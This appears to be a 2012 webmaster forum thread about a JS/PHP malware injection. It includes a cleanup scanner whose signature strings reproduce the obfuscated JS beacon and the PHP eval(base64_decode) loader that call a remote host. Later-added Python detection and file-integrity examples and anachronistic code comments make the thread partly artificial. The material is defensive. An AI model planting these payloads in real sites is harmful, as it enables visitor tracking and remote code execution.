GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Better check your JS and PHP files [new malware injects] (https://gfy.com/showthread.php?t=1052856)

SZNY 01-09-2012 07:42 AM

Better check your JS and PHP files [new malware injects]
 
Just wanted to share this with you as it might affect your traffic. Funny thing is that Google doesn't report it yet as badware.

There is a new kind of JS malware virus that injects code to make 1-pixel iframes and connects to certain sites.

I just scanned 150 domains and some of my WP installs were infected.

Here is a link from a German coder offering a workable solution. Copy the code into a PHP file and upload it to the root of your server.

Once done type www.xxxx.xx/filename.php to start scanning your files.

It also disinfects your code. Here are the links:
http://forum.nexoneu.com/NXEU.aspx?g=posts&m=3143118
http://blog.insidecomp.com/?p=33#more-33


PHP Code:

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>INSIDE Computer MalwareCheck 0.1</title>
</head>
<body>
<h1>Javascript und PHP Files werden auf Befall gecheckt:</h1>

<?php
echo '<h2>Startverzeichnis:'.getcwd().'</h2><br/>';
// dir_walk('/hp/ac/ab/vt/www/spd2011', 'showFiles');
$files_checked = 0;
$files_infected = 0;
echo '<table>';
dir_walk(getcwd(), 'checkFiles');
echo '</table>';

echo '<h2>Files checked: '.$files_checked.'<br/></h2>';
echo '<h2>Files infected: '.$files_infected.'<br/></h2>';
if ($files_infected == 0) {
    echo 'Alles im gr&uuml;nen Bereich...';
}

// Recursively walk $start_dir and call $func on every regular file found.
function dir_walk($start_dir, $func) {
    $entries = scandir($start_dir);
    foreach ($entries as $entry) {
        if ($entry == '.' || $entry == '..') {
            /* skip these */
        } else if (is_dir($start_dir . '/' . $entry)) {
            echo '<tr><td><b>Scanning...'.$start_dir . '/' . $entry.'</b></td></tr>';
            dir_walk($start_dir . '/' . $entry, $func);
        } else {
            $func($start_dir . '/' . $entry);
        }
    }
}

// Check one file against the known injection signature for its type.
function checkFiles($filename) {
    // disinfect JavaScript files
    if (substr($filename, -3) === '.js') {
        echo '<tr><td>.js-File checking: '.$filename.'</td>';
        $pattern = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;';
        disinfect($filename, $pattern);
    }
    // disinfect PHP files
    if (substr($filename, -4) === '.php') {
        echo '<tr><td>.php-File checking: '.$filename.'</td>';
        $pattern = '<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
        disinfect($filename, $pattern);
    }
}

// Undo the HTML escaping used during matching so the line is written back as plain source.
function restore_hsc($val) {
    $val = str_replace('&amp;', '&', $val);
    $val = str_replace('&ouml;', 'ö', $val);
    $val = str_replace('&auml;', 'ä', $val);
    $val = str_replace('&uuml;', 'ü', $val);
    $val = str_replace('&lt;', '<', $val);
    $val = str_replace('&gt;', '>', $val);
    $val = str_replace('&quot;', '"', $val);
    $val = str_replace('&#039;', "'", $val); // htmlspecialchars() escapes single quotes by default since PHP 8.1
    return $val;
}

// Strip every occurrence of $pattern from $filename and rewrite the file if anything was removed.
function disinfect($filename, $pattern) {
    global $files_checked, $files_infected;
    $files_checked++;
    $pattern = trim(htmlspecialchars($pattern)); // prepare pattern
    $lines = file($filename, FILE_IGNORE_NEW_LINES); // without this flag implode() below doubles every newline
    $found = 0;
    for ($i = 0; $i < sizeof($lines); $i++) {
        $current_line = trim(htmlspecialchars($lines[$i]));
        if (strstr($current_line, $pattern)) {
            $lines[$i] = str_replace($pattern, "", htmlspecialchars(trim($lines[$i])));
            $lines[$i] = preg_replace('/\s\s+/', ' ', $lines[$i]);
            $lines[$i] = restore_hsc($lines[$i]);
            $found++;
        }
    }
    $lines = array_values($lines);
    if ($found > 0) {
        $files_infected++;
        $file = fopen($filename, "w");
        fwrite($file, implode("\n", $lines));
        fclose($file);
        touch($filename); // touch() takes a path, not the closed handle
        echo " <td><span style=\"color:red;\"> is infected. Cured: $found injected objects</span></td></tr>";
    } else {
        echo " <td><span style=\"color:green;\"> - File is clean</span></td></tr>";
    }
}
?>
</body>
</html>


nico-t 01-09-2012 08:06 AM

How will this virus affect your server? Will this cause load issues and eventually a MySQL crash?

SZNY 01-09-2012 10:41 AM

Well, it will cause extra load on your server (makes more connections), plus your sites are flagged as malware by various AV software apps.

pornguy 01-09-2012 10:53 AM

Is this hitting blogs, or all sites in general?


Can you find it by looking at the code of the index or is it hidden?

SZNY 01-09-2012 11:00 AM

Doesn't matter, all sites that are using JS files.

pornguy 01-09-2012 11:04 AM

OK thanks

Damn.. More work.

raymor 01-09-2012 02:30 PM

Thanks, I'll add that signature to our scanner. I'll actually be interpreting and reducing the signature to catch other variations of the same thing. The posted code is awfully specific.
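The scanner in the first post matches one exact string per file type, which is what raymor means by "awfully specific". Below is an added example, not code from the thread, from the insidecomp blog or from raymor's scanner, of a detector that instead matches the traits of that payload: a hex-escaped string array bound to a `_0x...` variable, the `$_F=__FILE__;$_X=` obfuscator preamble, an `eval(base64_decode(...))` loader, and a 1x1 iframe. It only reports hits and never rewrites files. The rule names, the sample file contents and the temporary directory layout are constructed for the example.

```python
"""Heuristic scanner for the JS/PHP injection discussed in the thread.

Added example, not the scanner posted in the thread. Instead of matching one
exact obfuscated string it flags the structural traits of that payload, so
variants with another array name or another beacon host are still reported.
It reports matches and does not modify files. Samples below are constructed.
"""
import re
import tempfile
from pathlib import Path

# Rule name -> regex. Patterns describe the shape of the thread's sample, not its bytes.
RULES = {
    "hex_escaped_string_array":
        re.compile(r'var\s+_0x[0-9a-f]+\s*=\s*\[\s*"(?:\\x[0-9a-fA-F]{2})+"'),
    "obfuscator_preamble":
        re.compile(r'\$_F\s*=\s*__FILE__\s*;\s*\$_X\s*='),
    "eval_base64_loader":
        re.compile(r'eval\s*\(\s*base64_decode\s*\('),
    "one_pixel_iframe":
        re.compile(r'''<iframe\b[^>]*\b(?:width|height)\s*=\s*["']?1\b''', re.I),
}
SCAN_SUFFIXES = {".js", ".php"}

# Constructed samples (not taken from any real site).
CLEAN_JS = "function track(){ var el = document.getElementById('sc_co'); return !!el; }\n"
INFECTED_JS = ("function ok(){}\n"
               r'var _0xab12=["\x73\x63\x5F\x63\x6F","\x73\x72\x63"];var js=document[_0xab12[1]];')
CLEAN_PHP = "<?php echo base64_decode('aGVsbG8='); ?>\n"   # decoding alone is not a loader
INFECTED_PHP = ("<?php $_F=__FILE__;$_X='Pz48P3Bo';eval(base64_decode('JF9YPWJh'));"
                "$tmp = file_get_contents($url); echo $tmp; ?>\n")
IFRAME_PHP = ('<?php include "header.php"; ?>\n'
              '<iframe src="http://example.invalid/s.php" width="1" height="1" '
              'style="visibility:hidden"></iframe>\n')


def scan_text(text):
    """Return the names of all rules that match the given file content, in rule order."""
    return [name for name, rx in RULES.items() if rx.search(text)]


def scan_tree(root):
    """Walk root and scan every .js/.php file; return {path: [rule names]} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            # errors="replace" keeps a mis-encoded or partly binary file from aborting the scan
            matched = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if matched:
                hits[str(path)] = matched
    return hits


def demo():
    """Lay the constructed samples out in a temporary web root, scan it and
    return the hits keyed by file name."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "js" / "clean.js").write_text(CLEAN_JS)
        (root / "js" / "stats.js").write_text(INFECTED_JS)
        (root / "index.php").write_text(CLEAN_PHP)
        (root / "loader.php").write_text(INFECTED_PHP)
        (root / "footer.php").write_text(IFRAME_PHP)
        (root / "notes.txt").write_text(INFECTED_JS)   # wrong suffix: not scanned
        return {Path(p).name: rules for p, rules in scan_tree(root).items()}


if __name__ == "__main__":
    for name, rules in demo().items():
        print(f"{name}: {', '.join(rules)}")
```

Point `scan_tree()` at a copy of the web root and treat every hit as something to compare against a known-good copy from version control or backup, rather than editing it in place; the signature-stripping cure posted above also trims and collapses whitespace on every line it touches, so a restore from a clean copy is the safer fix.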

pimpware 01-09-2012 02:48 PM

Thanks for the heads up :thumbsup

All checked and clean.

blackmonsters 01-09-2012 04:25 PM

Cleaning up your files is good but that doesn't fix the problem.

How did that get into your site to begin with is the question.

SZNY 01-09-2012 04:31 PM

Quote:

Originally Posted by blackmonsters (Post 18679694)
Cleaning up your files is good but that doesn't fix the problem.

How did that get into your site to begin with is the question.

In my case I had some test domains which were not that secured and infected the rest of the server.

All is pretty closed now. Took me some time but all is cleaned and hope it can help others.

V_RocKs 01-09-2012 05:36 PM

crazy h4x0r5

Darkhorse 01-09-2012 06:01 PM

Thanks for this, will have to check mine out.

harvey 01-09-2012 07:07 PM

The cleaning code itself makes my antivirus go bananas.

FlorianPC 01-10-2012 01:16 AM

Thanks for the code, I will check my domains too.

gabe100 01-10-2012 10:14 AM

If you don't think you're vulnerable read about my nightmare below. It's quite embarrassing. I don't post much. No one wants to write a story like this, hopefully it helps someone.

I was hit Thanksgiving day of last year. 12 years running adult sites and never a problem. In my case, the permissions on 1 PHP file within OpenX were wide open. Permissions don't sync across servers and malware was injected on my splash redirecting to a Russian site. Multiple shells were installed and if you have ever seen your backend/library via a shell with Russian headers and tags, it's the scariest thing ever.

Quite elegant too, all your folders and files are color coded, everything wide open.

The second scariest thing is looking at the code injected on to the page itself. In my case the code was 7 or 8 strange characters, you can't even see the redirect buried at the very bottom of the page. The page is straight HTML, a simple warning page. Super clean. The characters look like the innocent copyright tags.

That code referenced scripts buried far in my file structure.

AdWords suspended, banned from Google. Cybercat pulling me, TJ yanked me. Kenny emailing me, Paperstreet emailing me. Pornhub video b gone. Exo paused. NIGHTMARE!

That was my Thanksgiving.

The good part is it didn't last long. Once clean I resubmitted to google and within 5 seconds I was approved and it was like nothing ever happened. All references to us distributing malware within google search vanished.

What saved us was clonebox and Ray, having a great host and my man Konrad. The very early symptoms won't be apparent. First extremely vague warnings from Avast, then AVG then it gets wide out and the messages start rolling in from customers and partners. The nightmare really starts once you get banned from google. All paid SEO Gone, all organic SEO replaced with malware warnings.

Multiple servers on lockdown, thousands of folders each with perfect permissions set and yet 1 file wide open.

Looking back it's probably best it happened because other measures are now in place to ensure that never happens again.

Check your permissions and, at the very least, get a script installed that alerts you to any changes on your boxes. Having a firewall on your FTP/SSH isn't enough. These new malware injections are pretty clever.

Rather embarrassing, I had to learn the hard way. Hopefully you won't have to. :)
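gabe100's two pieces of advice (check permissions; get alerted to any change on the box) in working form, as an added example that is not part of the thread and not the tool gabe100 used: it records every file's SHA-256 and permission bits in a JSON manifest, and a later run reports files that were added, removed, modified or re-permissioned, plus anything world-writable. The sample tree, file names and manifest location are constructed assumptions.

```python
"""Baseline-and-diff integrity check for a web root.

Added example, not a tool from the thread. It stores each file's SHA-256 and
mode bits in a JSON manifest; a later run compares against that baseline and
reports added, removed, modified and re-permissioned files, and any file that
is world-writable. The tree built in demo() is constructed.
"""
import hashlib
import json
import stat
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map relative POSIX path -> {"sha256": hex digest, "mode": octal string}
    for every regular file under root (symlinks are skipped, not followed)."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        manifest[path.relative_to(root).as_posix()] = {
            "sha256": hashlib.sha256(path.read_bytes()).hexdigest(),
            "mode": oct(stat.S_IMODE(path.stat().st_mode)),
        }
    return manifest


def world_writable(manifest):
    """Relative paths whose mode grants write to 'other' (the o+w bit)."""
    return sorted(p for p, m in manifest.items() if int(m["mode"], 8) & stat.S_IWOTH)


def diff_manifests(old, new):
    """Compare two manifests and list what changed between them."""
    common = set(old) & set(new)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in common if old[p]["sha256"] != new[p]["sha256"]),
        "mode_changed": sorted(p for p in common if old[p]["mode"] != new[p]["mode"]),
    }


def save_manifest(manifest, path):
    Path(path).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(path):
    return json.loads(Path(path).read_text())


def demo():
    """Constructed scenario: take a baseline, then simulate an injected JS file,
    a dropped PHP file and a permissions slip, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "www"
        (root / "js").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "js" / "app.js").write_text("console.log('ok');\n")
        for p in (root / "index.php", root / "js" / "app.js"):
            p.chmod(0o644)
        baseline_path = Path(tmp) / "baseline.json"   # in real use keep this off the web server
        save_manifest(build_manifest(root), baseline_path)

        # The kinds of change the thread describes.
        with open(root / "js" / "app.js", "a") as f:
            f.write('var _0x1234=["\\x73\\x72\\x63"];\n')               # payload appended
        (root / "dropped.php").write_text("<?php /* constructed */ ?>\n")  # new file
        (root / "dropped.php").chmod(0o644)
        (root / "index.php").chmod(0o666)                                   # now world-writable

        current = build_manifest(root)
        report = diff_manifests(load_manifest(baseline_path), current)
        report["world_writable"] = world_writable(current)
        return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Take the baseline right after a clean deploy, keep the manifest somewhere the web server's user cannot write (otherwise anything that can rewrite the site can rewrite the baseline too), and run the comparison from cron so the alert arrives before the AV warnings and Google flags do. Cleaning files without closing the permission hole that let them in leaves the box reinfectable, which is the point blackmonsters raised earlier in the thread.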

